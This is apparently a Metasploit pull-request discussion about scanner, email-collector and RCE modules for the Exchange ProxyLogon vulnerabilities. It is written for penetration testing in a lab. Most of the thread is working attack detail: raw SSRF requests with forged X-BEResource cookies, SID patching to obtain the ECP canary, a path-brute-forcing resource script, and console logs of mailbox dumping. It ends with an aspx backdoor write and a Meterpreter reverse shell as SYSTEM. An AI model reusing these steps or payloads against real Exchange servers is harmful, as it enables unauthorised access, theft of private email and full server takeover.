add. Auxiliary/Exploit Scanner/Gather/RCE for Exchange ProxyLogon (CVE-2021-26855)

[mekhalleh]

Introduction

An issue was discovered in Microsoft Exchange Server that allows an attacker bypassing the authentication and impersonating as the admin (CVE-2021-26855). By chaining this bug with another
post-auth arbitrary-file-write vulnerability to get code execution (CVE-2021-27065).

As a result, an unauthenticated attacker can execute arbitrary commands on Microsoft Exchange Server.

This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013,
Exchange 2019 CU8 < 15.02.0792.010).

All components are vulnerable by default.

Verification Steps

1. Start msfconsole
2. Do: use auxiliary/scanner/http/exchange_proxylogon
3. Do: set RHOSTS [IP]
4. Do: run

Options

1. METHOD. HTTP Method to use (for CVE-2021-26855). Default: POST
2. Proxies. This option is not set by default.
3. RPORT. The default setting is 443. To use: set RPORT [PORT]
4. SSL. The default setting is true.
5. THREADS. The default setting is 1.
6. VHOST. This option is not set by default.

Scenarios

msf6 auxiliary(scanner/http/exchange_proxylogon) > options 

Module options (auxiliary/scanner/http/exchange_proxylogon):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   METHOD   POST             yes       HTTP Method to use (for CVE-2021-26855). (Accepted: GET, POST)
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   172.16.5.6       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    443              yes       The target port (TCP)
   SSL      true             no        Negotiate SSL/TLS for outgoing connections
   THREADS  1                yes       The number of concurrent threads (max one per host)
   VHOST                     no        HTTP server virtual host


msf6 auxiliary(scanner/http/exchange_proxylogon) > run

[+] https://172.16.5.6/owa/auth/x.js - The target is vulnerable to CVE-2021-26855.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/exchange_proxylogon) > 

References

1. https://proxylogon.com/
2. https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse

[bcoles]

Please resolve msftidy and rubocop errors:

--- Checking new and changed module syntax with tools/dev/msftidy.rb ---
modules/auxiliary/scanner/http/exchange_proxylogon.rb - [INFO] No CVE references found. Please check before you land!
modules/auxiliary/scanner/http/exchange_proxylogon.rb - [ERROR] Module should not be executable (+x)
== modules/auxiliary/scanner/http/exchange_proxylogon.rb ==
C: 12: 22: [Correctable] Layout/ModuleHashOnNewLine: update_info should start on its own line
C: 12: 23: [Correctable] Layout/ModuleHashOnNewLine: info should start on its own line
C: 25:  7: [Correctable] Layout/ModuleDescriptionIndentation: Module descriptions should be properly aligned to the 'Description' key, and within %q{ ... }
C: 43: 24: [Correctable] Layout/ModuleHashOnNewLine: A new line is missing
C: 46: 24: [Correctable] Layout/FirstArrayElementIndentation: Use 2 spaces for indentation in an array, relative to the start of the line where the left square bracket is.
C: 47: 22: [Correctable] Layout/FirstArrayElementIndentation: Indent the right bracket the same as the start of the line where the left bracket is.

1 file inspected, 6 offenses detected, 6 offenses auto-correctable
modules/auxiliary/scanner/http/exchange_proxylogon.rb - [ERROR] Rubocop failed. Please run rubocop -a modules/auxiliary/scanner/http/exchange_proxylogon.rb and verify all issues are resolved

[gwillcox-r7]

Please also run tools/dev/msftidy_docs.rb on your documentation file. There are a number of lines that are overflowing that should be aligned to a max of about 120 characters in width, and the titles of a few of the sections need to change.

[cdelafuente-r7]

Thanks for this great contribution @mekhalleh! I just left a few minor comments, when you got a chance.

[cdelafuente-r7]

I was not able to make the module grab emails and contacts from Exchange 2016 CU12 Version 15.1 (Build 1713.5) I'm getting an Access is denied error. The scanner module works fine and confirms the target is vulnerable. Any idea why?

Here is the response I got:

<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
  <s:Header>
    <h:ServerVersionInfo xmlns:h="http://schemas.microsoft.com/exchange/services/2006/types" xmlns="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" MajorVersion="15" MinorVersion="1" MajorBuildNumber="1713" MinorBuildNumber="5"/>
  </s:Header>
  <s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
    <m:GetFolderResponse xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types">
      <m:ResponseMessages>
        <m:GetFolderResponseMessage ResponseClass="Error">
          <m:MessageText>Access is denied. Check credentials and try again., </m:MessageText>
          <m:ResponseCode>ErrorAccessDenied</m:ResponseCode>
          <m:DescriptiveLinkKey>0</m:DescriptiveLinkKey>
          <m:Folders/>
        </m:GetFolderResponseMessage>
      </m:ResponseMessages>
    </m:GetFolderResponse>
  </s:Body>
</s:Envelope>

[mekhalleh]

You need have two vulnerable Exchange server to check the exploitation.

My lab is:
1 x Windows 2012 R2 server (w/ active directory) and I've install Exchange Server 2016 on this one.
1 x Widows 2012 R2 (member) and I've install another Exchange server 2016.

Work with the collector module:

• RHOSTS is the IP address of server 1
• SERVER_NAME is the hostname of the server 2

** Note: You can too inverse RHOSTS with the ip address of server 2 and set SERVER_NAME with the hostname of server 1. Both ways it works!

You got this message (Access is denied. Check credentials and try again.), because the attack need the UID of the user and :

1. you need to know this in advance, but it's hard to get in the remote context.
2. you send the SSRF on the second server and the request is valid.

The module is based on this second option.

[je5442804]

@mekhalleh The rce moudle doesn't work in msf windows version, I'm sure my target exist exploit,and is alwasy seem ok but not session back with windows/x64/meterpreter/reverse_tcp.
In a strange way it always print from "[!] Wait a lot [0]" to "[!] Wait a lot [29]" before "[+] Yeeting windows/x64/meterpreter/reverse_tcp payload ",It just really slow and abnormal.

@je5442804 this is what I get when exchange is not installed in the default directory. would not be the case, by any chance?

set ExchangeBasePath C:\\path\\to\\exchange\\v15

Thank you so much!
May it possible to enum the exchange path automatically in future?

[mekhalleh]

May it possible to enum the exchange path automatically in future?

you can already do that with msf scripting resources with known path list from file to brute the path.

But maybe it is possible to find a local path disclosure. I don't know.

<ruby>
  run_single('use exploit/windows/http/exchange_proxylogon_rce')
  run_single('set EMAIL gaston.lagaffe@pwned.lab')
  run_single('set RHOST X.X.X.X')
  run_single('set LHOST X.X.X.X')
  run_single('run')
  paths = File.read('path.lst') if File.exist?('path.lst')
  paths.each_line do |path|
    run_single("set ExchangeBasePath #{path.gsub('\\', '\\\\\\')}")
    run_single('run')
  end
</ruby>

[mekhalleh]

Just add new option UseAlternatePath (Use the IIS root dir as alternate path). if you don't know where Exchange Server is installed, you can take your chance with C:\ inetpub\ wwwroot\ aspnet_client to write the backdoor.

[cdelafuente-r7]

Thanks for updating the code @mekhalleh. I just did a last round of review and added a some comments.
Particularly, the issue with oab_id throwing a NoMethodError was breaking the exploit for me. Please, let me know if you have any questions.

[mekhalleh]

@cdelafuente-r7 nice.. it's done ;)

[mekhalleh]

@cdelafuente-r7, in the last update, I added and fixed a lot of stuff ...

RCE module

Started with the missing options for web delivery. But now there is no more need for this, I have added Powershell.

Regarding the IIS path, I added the option IISWritePath (like Exchange). By the way, with me it does not work on the cluster IP address. If this is the case for you, try on the IP of one of your live exchange server.

I'm just redoing a commit to remove a reference to DisablePayloadHandler and add X86 (maybe useful? Untested Exchange 2010 32-bits)

Know issue

1. With cmd/windows/adduser I have to change the password because, in my lab this password does not meet the complexity requirements. And I have a default configuration (I haven't changed this). I use Meta!sploit$1 for testing.
2. Depending on the payload used, two cmd.exe processes remain alive on the server. If this is the case, you cannot make another attempt if they are not killed ...
3. For me, set UseAlternatePath true does not work on cluster IP. If this is the case for you, try on the IP of one of your live exchange server.

Collector module

I've add a check who detect if the internal server targeted is alive.

[mekhalleh]

Hello @cdelafuente-r7, I'm ready to land;) if you don't have any other comments.

[mkunz-sec]

@mekhalleh I pulled your latest, both my issues remain. Proxy is still required to do the check and the exploit fails on the OAB-id request. I'm using a fresh lab build of Exchange 2016 x64 on Server 2012R2 where AD is on another server. The exchange write path and base path are correct with their defaults values.

[mekhalleh]

@mekhalleh I pulled your latest, both my issues remain. Proxy is still required to do the check and the exploit fails on the OAB-id request. I'm using a fresh lab build of Exchange 2016 x64 on Server 2012R2 where AD is on another server. The exchange write path and base path are correct with their defaults values.

@mkunz-sec I use 2 different env of metasploit framework.

First env, based on BlackArch package and second is my develop env (on Ubuntu Linux). On the 2 env I've not trouble about proxy. Maybe you have issue with your framework.

I think @cdelafuente-r7 would have warned me about that.

But if you want to send me the traces that I am looking at or it fails ;)

With proxy and without proxy. Use set HttpTrace true

[mekhalleh]

@mkunz-sec and if you want test this : https://github.com/mekhalleh/exchange_proxylogon/blob/develop/exchange_proxylogon_rce.rb

[mkunz-sec]

The trace showed an error message that helped a lot.

After logging in and setting the timezone it works. We should probably check for this response.

Here is the scanner without the proxy being set

My lab exchange doesn't have a valid ssl cert

[mkunz-sec]

Not sure if it helps, but here's the full httptrace of target 1 failing and target 0 succeeding. No av on exchange or ad.

target1.txt

[mekhalleh]

Not sure if it helps, but here's the full httptrace of target 1 failing and target 0 succeeding. No av on exchange or ad.

target1.txt

If you are using the latest version of the module, you no longer need web delivrery. Now this use Powershell oneliner stager.

Also look at known issues, especially number 2 (#14860 (comment)) Depending on the payload used, two cmd.exe processes remain alive on the server. If this is the case, you cannot make another attempt if they are not killed ...

But for your proxy problem? I do not know.

[mekhalleh]

The trace showed an error message that helped a lot.

@cdelafuente-r7 There is a test that I cannot perform on my lab, because I cannot test method 2 to take the canary.

But if you feel like doing it. The context is as follows:
/!\ WARNING: DO NOT CONNECT TO THE ADMIN MAILBOX
1 Windows 2012 + AD + Exchange (simply, on the same host).

Create user mailbox and connect to that.

Run the module on targeted user mailbox. If you have the following message:

replace all occurrence of:

        'msExchLogonMailbox' => patch_sid(exploit_info[1]),
        'msExchTargetMailbox' => patch_sid(exploit_info[1]),

by

        'msExchLogonMailbox' => 'S-1-5-20',
        'msExchTargetMailbox' => 'S-1-5-20',

and re-run the module. And let me know if it works.

Thanks by advance ;)

[mkunz-sec]

I got the same message with a user email time zone both set and not set. Changing the code to use the static sid prefix gave the same you need to login as administrator@tech.com (I'm targeting user@tech.com) and set a time zone. Setting a timezone for both administrator and my user account gave this error with the code change.

The patch_sid method worked you just need to fail if the response tells you to set the time zone.

[cdelafuente-r7]

Thanks for the updates and for the latest addition @mekhalleh ! I tested the new Powershell target and it works great!

I just left a few comments for the last round of review.

As requested, I tested the second method to get the canary with an non-admin email. I got a slightly different error (access denied). Changing the SID to S-1-5-20 give me the same error:

[*] Try to get a good msExchCanary (without correcting the user SID)
####################
# Request:
####################
POST /ecp/ws.js HTTP/1.1
Host: <redacted>
User-Agent: Mozilla/5.0
Cookie: X-BEResource=Admin@SRV02:444/ecp/proxyLogon.ecp?a=~2145660510;
msExchLogonMailbox: S-1-5-20
msExchTargetMailbox: S-1-5-20
Content-Type: text/xml; charset=utf-8
Content-Length: 91

<r at="Negotiate" ln="TestUserN1"><s>S-1-5-21-<redacted>-<redacted>-<redacted>-1114</s></r>
####################
# Response:
####################
HTTP/1.1 241
Cache-Control: private
Server: Microsoft-IIS/10.0
request-id: 6d866e85-c28c-4b7f-8bbb-7069f704c9fd
X-CalculatedBETarget: srv02
X-Content-Type-Options: nosniff
X-DiagInfo: SRV02
X-BEServer: SRV02
X-UA-Compatible: IE=10
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=ad7b3f3a-f3c1-4b92-8637-b8a4e4567632; path=/; secure; HttpOnly, msExchEcpCanary=z6mSmJxdgk-xkat7oAM2ycA_Vzvd7tgIZjcK8Q0_s42gb1vYcoLxcPV-qsD3o_jwAk4vwWA5pXA.; path=/ecp
X-Powered-By: ASP.NET
X-FEServer: SRV02
Date: Mon, 22 Mar 2021 15:55:21 GMT
Content-Length: 0


####################
# Request:
####################
POST /ecp/ws.js HTTP/1.1
Host: <redacted>
User-Agent: Mozilla/5.0
Cookie: X-BEResource=Admin@SRV02:444/ecp/DDI/DDIService.svc/GetList?reqId=1615583487987&schema=VirtualDirectory&msExchEcpCanary=z6mSmJxdgk-xkat7oAM2ycA_Vzvd7tgIZjcK8Q0_s42gb1vYcoLxcPV-qsD3o_jwAk4vwWA5pXA.&a=~2068268331; ASP.NET_SessionId=ad7b3f3a-f3c1-4b92-8637-b8a4e4567632; msExchEcpCanary=z6mSmJxdgk-xkat7oAM2ycA_Vzvd7tgIZjcK8Q0_s42gb1vYcoLxcPV-qsD3o_jwAk4vwWA5pXA.;
msExchLogonMailbox: S-1-5-20
msExchTargetMailbox: S-1-5-20
Content-Type: application/json; charset=utf-8
Content-Length: 159

{"filter":{"Parameters":{"__type":"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel","SelectedView":"","SelectedVDirType":"OAB"}},"sort":{}}
####################
# Response:
####################
HTTP/1.1 500 Internal Server Error
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/10.0
request-id: 44fd24a5-4ebc-4314-bcbb-3d9dc1593efc
X-CalculatedBETarget: srv02
X-Content-Type-Options: nosniff
X-ECP-ERROR: Microsoft.Exchange.Configuration.Authorization.CmdletAccessDeniedException
jsonerror: true
X-DiagInfo: SRV02
X-BEServer: SRV02
X-UA-Compatible: IE=10
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-FEServer: SRV02
Date: Mon, 22 Mar 2021 15:55:21 GMT
Content-Length: 2125

{"Message":"Your request couldn't be completed. Please try again, and if the problem persists, contact your administrator.","ExceptionDetail":{"HelpLink":null,"InnerException":null,"Message":"You don't have permission to open this page. If you're a new user or were recently assigned credentials, please wait 15 minutes and try again.","StackTrace":"   at Microsoft.Exchange.Management.DDIService.CmdletActivity.IsRunnable(DataRow input, DataTable dataTable, DataObjectStore store)\u000d\u000a   at Microsoft.Exchange.Management.DDIService.BranchActivity.Run(DataRow input, DataTable dataTable, DataObjectStore store, Type codeBehind, UpdateTableDelegate updateTableDelegate)\u000d\u000a   at Microsoft.Exchange.Management.DDIService.Workflow.Run(DataRow input, DataTable dataTable, DataObjectStore store, Type codeBehind, UpdateTableDelegate updateTableDelegate)\u000d\u000a   at Microsoft.Exchange.Management.DDIService.WSListDataHandler.ExecuteCore(Workflow workflow)\u000d\u000a   at Microsoft.Exchange.Management.DDIService.WSDataHandler.Execute()\u000d\u000a   at Microsoft.Exchange.Management.DDIService.DDIServiceHelper.GetListCommon(DDIParameters filter, SortOptions sort, Boolean forGetProgress)\u000d\u000a   at Microsoft.Exchange.Management.DDIService.DDIService.GetList(DDIParameters filter, SortOptions sort)\u000d\u000a   at SyncInvokeGetList(Object , Object[] , Object[] )\u000d\u000a   at System.ServiceModel.Dispatcher.SyncMethodInvoker.Invoke(Object instance, Object[] inputs, Object[]& outputs)\u000d\u000a   at System.ServiceModel.Dispatcher.DispatchOperationRuntime.InvokeBegin(MessageRpc& rpc)\u000d\u000a   at System.ServiceModel.Dispatcher.ImmutableDispatchRuntime.ProcessMessage5(MessageRpc& rpc)\u000d\u000a   at System.ServiceModel.Dispatcher.ImmutableDispatchRuntime.ProcessMessage11(MessageRpc& rpc)\u000d\u000a   at System.ServiceModel.Dispatcher.MessageRpc.Process(Boolean isOperationContextSet)","Type":"Microsoft.Exchange.Configuration.Authorization.CmdletAccessDeniedException"},"ExceptionType":"Microsoft.Exchange.Configuration.Authorization.CmdletAccessDeniedException","StackTrace":null}
[-] Exploit aborted due to failure: not-found: No 'OAB Id' was found
[*] Exploit completed, but no session was created.

Also, would you mind adding your comment about the RCE module (known issues, etc.) to the module documentation? I think it is a very valuable information and it will probably be lost in this PR thread.

If you don't have anything to add to this PR, I think we're good to land once the last round of comments are addressed.

[mekhalleh]

3. For me, set UseAlternatePath true does not work on cluster IP. If this is the case for you, try on the IP of one of your live exchange server.

I tested again, it works.

If you don't have anything to add to this PR, I think we're good to land once the last round of comments are addressed.

All is done ;) it was very interesting and a bit complicated too ... doing blind things like patching SID was not easy.

@cdelafuente-r7, very thank for your help ;)

[cdelafuente-r7]

Thank you for this great contribution @mekhalleh and for being so responsive. It was a pleasure to work with you on these exploits.

I re-tested the 3 modules and everything looks fine. I just need to fix some minor issues that Rubocop reports on the up-to-date master branch (JSON Unnecessary symbol conversion). I'll add a new commit and land it.

One last feedback for the next contributions (I hope there will be soon!). It is recommended to submit only one module per pull request. It is usually faster to land since we don't have to wait for every module to be ready. In this case, both auxiliary modules could have been landed before the RCE.

Example output (Exchange 2016 CU12 on Windows Server 2016)

Scanner module (exchange_proxylogon)

msf6 auxiliary(scanner/http/exchange_proxylogon) > options

Module options (auxiliary/scanner/http/exchange_proxylogon):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   METHOD   POST             yes       HTTP Method to use for the check. (Accepted: GET, POST)
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   <redacted>       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    443              yes       The target port (TCP)
   SSL      true             no        Negotiate SSL/TLS for outgoing connections
   THREADS  1                yes       The number of concurrent threads (max one per host)
   VHOST                     no        HTTP server virtual host

msf6 auxiliary(scanner/http/exchange_proxylogon) > set verbose true
verbose => true
msf6 auxiliary(scanner/http/exchange_proxylogon) > run

[+] https://<redacted>:443 - The target is vulnerable to CVE-2021-26855.
[+] Obtained HTTP response code 500 for https://<redacted>/ecp/n.js.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/exchange_proxylogon) > vulns

Vulnerabilities
===============

Timestamp                Host           Name                                   References
---------                ----           ----                                   ----------
2021-03-23 11:10:20 UTC  <redacted>  Microsoft Exchange ProxyLogon Scanner  CVE-2021-26855,LOGO-https://proxylogon.com/images/logo.jpg,URL-https://proxylogon.com/,URL-https://aka.ms/exchangevulns

Auxiliary module (exchange_proxylogon_collector)

msf6 auxiliary(gather/exchange_proxylogon_collector) > options

Module options (auxiliary/gather/exchange_proxylogon_collector):

   Name         Current Setting         Required  Description
   ----         ---------------         --------  -----------
   ATTACHMENTS  true                    yes       Dump documents attached to an email
   EMAIL        TestUserDA@adlab.local  yes       The email account what you want dump
   FOLDER       inbox                   yes       The email folder what you want dump
   METHOD       POST                    yes       HTTP Method to use for the check (only). (Accepted: GET, POST)
   Proxies                              no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS       <redacted>              yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        443                     yes       The target port (TCP)
   SSL          true                    no        Negotiate SSL/TLS for outgoing connections
   TARGET                               no        Force the name of the internal Exchange server targeted
   VHOST                                no        HTTP server virtual host


Auxiliary action:

   Name           Description
   ----           -----------
   Dump (Emails)  Dump user emails from exchange server


msf6 auxiliary(gather/exchange_proxylogon_collector) > set verbose true
verbose => true
msf6 auxiliary(gather/exchange_proxylogon_collector) > run
[*] Running module against <redacted>

[*] https://<redacted>:443 - Attempt to exploit for CVE-2021-26855
[*] Internal server name (SRV02)
[*] https://<redacted>:443 - Sending autodiscover request
[*] Server: f652b961-f28e-448f-a8c6-5ff447ff06dd@adlab.local
[*] LegacyDN: /o=ExchangeLab/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=536cfe04ed60470a9a06efe4dfceebf6-Domain admin
[*] Internal target(s): https://srv02.adlab.local/owa/, https://srv03.adlab.local/owa/, https://srv04.adlab.local/owa/
[*] https://<redacted>:443 - Selecting the first internal server to respond
[+] Targeting internal: https://srv03.adlab.local/owa/
[*] https://<redacted>:443 - Attempt to dump emails for <TestUserDA@adlab.local>
[+] Successfuly connected to: inbox
[*] Selected folder: inbox (AQAWAFRlc3RVc2VyREFAYWRsYWIubG9jYWwALgAAA9Bu0QNzfSJCtyNN8/MAO/3dAQDAU+qesN5XT7uSUxtdH/HzAAACAQwAAAA=)
[*] Number of email found: 6
[*] https://<redacted>:443 - Processing dump of 6 items
[*] Download item: CQAAABYAAADAU+qesN5XT7uSUxtdH/HzAAADKMMt
[+] File saved to /home/msfuser/.msf4/loot/20210323121324_default_<redacted>_TestUserDAadlab_926179.txt
[*]    -> attachment: AAAWAFRlc3RVc2VyREFAYWRsYWIubG9jYWwARgAAAAAA0G7RA3N9IkK3I03z8zv93QcAwFPqnrDeV0+7klMbXR/x8wAAAAABDAAAwFPqnrDeV0+7klMbXR/x8wAAAyi2RQAAARIAEADUEUaPn4VnQp9tYQ3TKcCr (msf_cheat_sheet.pdf)
[+] File saved to /home/msfuser/.msf4/loot/20210323121324_default_<redacted>_TestUserDAadlab_302614.pdf
[*]
[*] Download item: FwAAABYAAADAU+qesN5XT7uSUxtdH/HzAAABXCXo
[+] File saved to /home/msfuser/.msf4/loot/20210323121324_default_<redacted>_TestUserDAadlab_578516.txt
[*]
[*] Download item: CQAAABYAAADAU+qesN5XT7uSUxtdH/HzAAABUbwk
[+] File saved to /home/msfuser/.msf4/loot/20210323121325_default_<redacted>_TestUserDAadlab_193278.txt
[*]
[*] Download item: FwAAABYAAADAU+qesN5XT7uSUxtdH/HzAAAAufk2
[+] File saved to /home/msfuser/.msf4/loot/20210323121325_default_<redacted>_TestUserDAadlab_145315.txt
[*]
[*] Download item: CQAAABYAAADAU+qesN5XT7uSUxtdH/HzAAAAABUp
[+] File saved to /home/msfuser/.msf4/loot/20210323121325_default_<redacted>_TestUserDAadlab_538870.txt
[*]
[*] Download item: CQAAABYAAADAU+qesN5XT7uSUxtdH/HzAAAAABUo
[+] File saved to /home/msfuser/.msf4/loot/20210323121325_default_<redacted>_TestUserDAadlab_253075.txt
[*]
[*] Auxiliary module execution completed
msf6 auxiliary(gather/exchange_proxylogon_collector) > set action Dump (Contacts)
action => Dump (Contacts)
msf6 auxiliary(gather/exchange_proxylogon_collector) > run
[*] Running module against <redacted>

[*] https://<redacted>:443 - Attempt to exploit for CVE-2021-26855
[*] Internal server name (SRV02)
[*] https://<redacted>:443 - Sending autodiscover request
[*] Server: f652b961-f28e-448f-a8c6-5ff447ff06dd@adlab.local
[*] LegacyDN: /o=ExchangeLab/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=536cfe04ed60470a9a06efe4dfceebf6-Domain admin
[*] Internal target(s): https://srv02.adlab.local/owa/, https://srv03.adlab.local/owa/, https://srv04.adlab.local/owa/
[*] https://<redacted>:443 - Selecting the first internal server to respond
[+] Targeting internal: https://srv03.adlab.local/owa/
[*] https://<redacted>:443 - Attempt to dump contacts for <TestUserDA@adlab.local>
[+] Successfuly connected to: contacts
[*] Selected folder: contacts (AQAWAFRlc3RVc2VyREFAYWRsYWIubG9jYWwALgAAA9Bu0QNzfSJCtyNN8/MAO/3dAQDAU+qesN5XT7uSUxtdH/HzAAACAQ4AAAA=)
[*] Number of contact found: 1
[*] https://<redacted>:443 - Processing dump of 1 items
[+] File saved to /home/msfuser/.msf4/loot/20210323121436_default_<redacted>_TestUserDAadlab_692912.txt
[*] Auxiliary module execution completed
msf6 auxiliary(gather/exchange_proxylogon_collector) > loot

Loot
====

host           service  type                             name                 content          info  path
----           -------  ----                             ----                 -------          ----  ----
<redacted>           TestUserDA@adlab.local_contacts                       text/plain             /home/msfuser/.msf4/loot/20210323121436_default_<redacted>_TestUserDAadlab_692912.txt
<redacted>           TestUserDA@adlab.local_inbox     msf_cheat_sheet.pdf  application/pdf        /home/msfuser/.msf4/loot/20210323121324_default_<redacted>_TestUserDAadlab_302614.pdf
<redacted>           TestUserDA@adlab.local_inbox                          text/plain             /home/msfuser/.msf4/loot/20210323121324_default_<redacted>_TestUserDAadlab_578516.txt
<redacted>           TestUserDA@adlab.local_inbox                          text/plain             /home/msfuser/.msf4/loot/20210323121325_default_<redacted>_TestUserDAadlab_193278.txt
<redacted>           TestUserDA@adlab.local_inbox                          text/plain             /home/msfuser/.msf4/loot/20210323121325_default_<redacted>_TestUserDAadlab_145315.txt
<redacted>           TestUserDA@adlab.local_inbox                          text/plain             /home/msfuser/.msf4/loot/20210323121325_default_<redacted>_TestUserDAadlab_538870.txt
<redacted>           TestUserDA@adlab.local_inbox                          text/plain             /home/msfuser/.msf4/loot/20210323121325_default_<redacted>_TestUserDAadlab_253075.txt
<redacted>           TestUserDA@adlab.local_inbox                          text/plain             /home/msfuser/.msf4/loot/20210323121324_default_<redacted>_TestUserDAadlab_926179.txt

RCE exploit module (exchange_proxylogon_rce)

msf6 exploit(windows/http/exchange_proxylogon_rce) > options

Module options (exploit/windows/http/exchange_proxylogon_rce):

   Name              Current Setting         Required  Description
   ----              ---------------         --------  -----------
   EMAIL             TestUserDA@adlab.local  yes       A known email address for this organization
   METHOD            POST                    yes       HTTP Method to use for the check (Accepted: GET, POST)
   Proxies                                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS            <redacted>              yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             443                     yes       The target port (TCP)
   SRVHOST           0.0.0.0                 yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT           8080                    yes       The local port to listen on.
   SSL               true                    no        Negotiate SSL/TLS for outgoing connections
   SSLCert                                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                                   no        The URI to use for this exploit (default is random)
   UseAlternatePath  false                   yes       Use the IIS root dir as alternate path
   VHOST                                     no        HTTP server virtual host


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     <redacted>       yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Powershell


msf6 exploit(windows/http/exchange_proxylogon_rce) > set verbose true
verbose => true
msf6 exploit(windows/http/exchange_proxylogon_rce) > run

[-] Handler failed to bind to <redacted>:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] Using auxiliary/scanner/http/exchange_proxylogon as check
[+] https://<redacted>:443 - The target is vulnerable to CVE-2021-26855.
[+] Obtained HTTP response code 500 for https://<redacted>/ecp/UT.js.
[*] Scanned 1 of 1 hosts (100% complete)
[+] The target is vulnerable.
[*] https://<redacted>:443 - Attempt to exploit for CVE-2021-26855
[*] Internal server name (SRV02)
[*] https://<redacted>:443 - Sending autodiscover request
[*] Server: f652b961-f28e-448f-a8c6-5ff447ff06dd@adlab.local
[*] LegacyDN: /o=ExchangeLab/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=536cfe04ed60470a9a06efe4dfceebf6-Domain admin
[*] https://<redacted>:443 - Sending mapi request
[*] SID: S-1-5-21-<redacted>-<redacted>-<redacted>-1113 (TestUserDA@adlab.local)
[*] https://<redacted>:443 - Sending ProxyLogon request
[*] Try to get a good msExchCanary (by patching user SID method)
[*] Try to get a good msExchCanary (without correcting the user SID)
[*] ASP.NET_SessionId: 66d5ddfa-50c8-4884-bf42-bc515baccad4
[*] msExchEcpCanary: GNjsq_R9KkaXojAV3mFh8sO7v2SA79gI4Dd-q-MVyCpLTDThkmh8YqwiQa3ul1s5koIhoNijVu0.
[*] OAB id: 9855d88e-3c84-40d3-bec1-3729028bed82 (OAB (Default Web Site))
[*] https://<redacted>:443 - Attempt to exploit for CVE-2021-27065
[*] Prepare the payload on the remote target
[*] Write the payload on the remote target
[!] Wait a lot (0)
[+] Yeeting windows/x64/meterpreter/reverse_tcp payload at <redacted>:443
[*] Powershell command length: 2494
[*] Sending stage (200262 bytes) to <redacted>
[*] Meterpreter session 1 opened (<redacted>:4444 -> <redacted>:40487) at 2021-03-23 12:23:37 +0100
[*] Sending stage (200262 bytes) to <redacted>
[*] Meterpreter session 2 opened (<redacted>:4444 -> <redacted>:40486) at 2021-03-23 12:23:37 +0100
[-] Failed to load client script file: /home/msfuser/dev/src/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv.rb
[+] Deleted C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\fohKcFS.aspx

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : SRV02
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : ADLAB
Logged On Users : 11
Meterpreter     : x64/windows
meterpreter > exit
[*] Shutting down Meterpreter...

[*] <redacted> - Meterpreter session 2 closed.  Reason: User exit

msf6 exploit(windows/http/exchange_proxylogon_rce) > set target 1
target => 1
msf6 exploit(windows/http/exchange_proxylogon_rce) > run

[-] Handler failed to bind to <redacted>:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] Using auxiliary/scanner/http/exchange_proxylogon as check
[+] https://<redacted>:443 - The target is vulnerable to CVE-2021-26855.
[+] Obtained HTTP response code 500 for https://<redacted>/ecp/NqX.js.
[*] Scanned 1 of 1 hosts (100% complete)
[+] The target is vulnerable.
[*] https://<redacted>:443 - Attempt to exploit for CVE-2021-26855
[*] Internal server name (SRV02)
[*] https://<redacted>:443 - Sending autodiscover request
[*] Server: f652b961-f28e-448f-a8c6-5ff447ff06dd@adlab.local
[*] LegacyDN: /o=ExchangeLab/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=536cfe04ed60470a9a06efe4dfceebf6-Domain admin
[*] https://<redacted>:443 - Sending mapi request
